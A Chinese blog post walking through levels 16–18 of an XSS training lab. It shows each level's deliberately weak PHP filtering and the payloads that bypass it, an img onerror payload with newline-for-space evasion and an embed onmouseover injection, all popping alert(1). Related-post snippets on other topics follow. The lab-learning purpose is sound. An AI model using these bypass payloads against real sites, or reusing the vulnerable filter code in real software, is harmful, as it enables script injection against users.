2. 程式人生 > 實用技巧 >XSS挑戰賽(4)

XSS挑戰賽(4)

阿新 發佈:2020-08-16

16-20關

第十六關

關鍵程式碼為:

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace(" ","",$str2);
$str4=str_replace("/","",$str3);
$str5=str_replace(" ","",$str4);
echo "<center>".$str5."</center>";
?>

對 script,空格 ,/ ,都進行了替換,但是沒有對尖括號進行替換,而不使用script進行彈窗有很多的方式,例如我們使用 img 標籤進行彈窗

payload為

?keyword=<img%0asrc=x%0aonerror=alert(1)>

因為空格被過濾了,所以我們採用一些能夠替換空格的字元進行繞過,這裡使用%0a

十七關

關鍵程式碼為:

<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

之前使用 htmlspecialchars 函式過濾的地方,我們都是大部分是通過 on 事件來觸發XSS,這裡也一樣,但是中間有等號,需要閉合掉

payload構造為

?arg01=a&arg02=b%0aonmouseover=alert(1)

使用onmouseover滑鼠移動事件來觸發XSS

原始碼為:

十八關

關鍵程式碼為:

<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

感覺這個程式碼跟前一關差不多

用之前的payload

?arg01=a&arg02=b onmouseover=alert(1)

通過此關

19,20關考點是 flash XSS,需要對flash反編譯對原始碼進行分析,暫時跳過,啥時候學了flash再對這兩關進行補充

以上

相關推薦

XSS挑戰賽4

16-20關 第十六關 關鍵程式碼為: <?php ini_set(\"display_errors\", 0); $str = strtolower($_GET[\"keyword\"]);

XSS挑戰賽1

以前囫圇吞棗做過一遍,現在從頭再來 第一關網址為:http://127.0.0.1/xss-labs-master/level1.php?name=test

XSS挑戰賽2

進入第六關 簡單判斷過濾情況 <>script\"\'/ 檢視原始碼 可以看到第二個紅框部分跟之前類似,閉合雙引號嘗試進行彈窗

XSS挑戰賽3

檢視關鍵程式碼: <?php ini_set(\"display_errors\", 0); $str = $_GET[\"keyword\"]; $str00 = $_GET[\"t_sort\"];

iOS——runtime4:淺析物件的建立

分析 在我們的main.m中輸入以下程式碼: #import <Foundation/Foundation.h> int main(int argc,const char * argv[]) {

2019年Java面試題基礎系列228道4,快看看哪些你還不會?

2019年Java面試題基礎系列228道 第一篇更新1~20題的答案解析 juejin.im/post/5de8c6… 第二篇更新21~50題答案解析

分散式唯一ID生成系列4——Redis叢集實現的分散式ID適合做分散式ID嗎

今天我們來講一下Redis叢集實現的分散式ID的過程,總結一下Redis叢集是否適合做分散式ID?

SQL學習基礎——MySQL入門4_JDBC資料庫連線池

文章目錄1. 資料庫連線池1. 概念:2. 好處:3. 實現:4. C3P0:資料庫連線池技術5. Druid:資料庫連線池實現技術,由阿里巴巴提供的2.Spring JDBC

資料庫4匯入初始化資料

4.匯入資料 第一步:登入mysql資料庫管理系統 dos 命令系統mysql -uroot ip 輸入密碼

寫出下面各邏輯表示式的值。設a=3,b=4,c=5。 寫出下面各邏輯表示式的值。設a=3,b=4,c=5。 1a + b > c && b == c 2a || b + c && b - c 3!(a > b) && !c || 1 (4)!(x = a) && (y = b)

寫出下面各邏輯表示式的值。設a=3,b=4,c=5。 1a + b > c && b == c 2a || b + c && b - c

圖資料分析4

散點圖 import matplotlib; from pandas import read_csv; import matplotlib.pyplot as plt; data = read_csv(\"5.1\\\\data.csv\")

Vue.js前端框架系統學習4——Vue指令之v-text,v-html,v-if,v-show

寫在前面的話:繼續上一篇文章,來學習一下vue的指令。 指令 指令 (Directives) 是帶有 v- 字首的特殊 attribute。指令 attribute 的值預期是單個 JavaScript 表示式 (v-for 是例外情況)。指令的職責是,當表示式的

HotSpot的類模型4

我們繼續接著上一篇HotSpot的類模型3分析,這次主要分析表示java陣列的C++類。

WinForm窗體程式中使用CefSharp獲取載入後的資源、擷取request引數、攔截response資料、注入jquery檔案和js程式碼4-注入jquery檔案和js程式碼

原始碼地址:原始碼csdn 或者底部qq問我要 六、注入jquery檔案和js程式碼 在介面button按鈕點選事件中

從零開始一起學Blazor WebAssembly 開發4

登入模組基本完成了,登入主要用了以下幾個點: 1、後端採用的Abp Vnext 框架,這個框架自帶的IdentityServer4使用者角色許可權控制,這個框架登入研究了好一陣子,有幾個坑這裡說下:

Jmeter 常用函式4- 詳解 __setProperty

如果你想檢視更多 Jmeter 常用函式可以在這篇文章找找哦 https://www.cnblogs.com/poloyy/p/13291704.html

從0開始的機器學習——knn演算法篇4

本次實驗採用另一個數據集——手寫字母資料集 首先引入必要的庫: import numpy as npimport matplotlibimport matplotlib.pyplot as pltfrom sklearn import datasets

老司機帶你玩轉面試4:Redis 高可用之哨兵模式

前文回顧 建議前面文章沒看過的同學先看下前面的文章: 「老司機帶你玩轉面試1:快取中介軟體 Redis 基礎知識以及資料持久化」

效能測試必備知識4- 使用 stress 和 sysstat

做效能測試的必備知識系列,可以看下面連結的文章哦 https://www.cnblogs.com/poloyy/category/1806772.html

複習動規4

昨天忘記寫了,今天帶著昨天的份一起寫了。 斜率優化DP 第一道,[HNOI2008]玩具裝箱。非常經典的斜率優化dp題。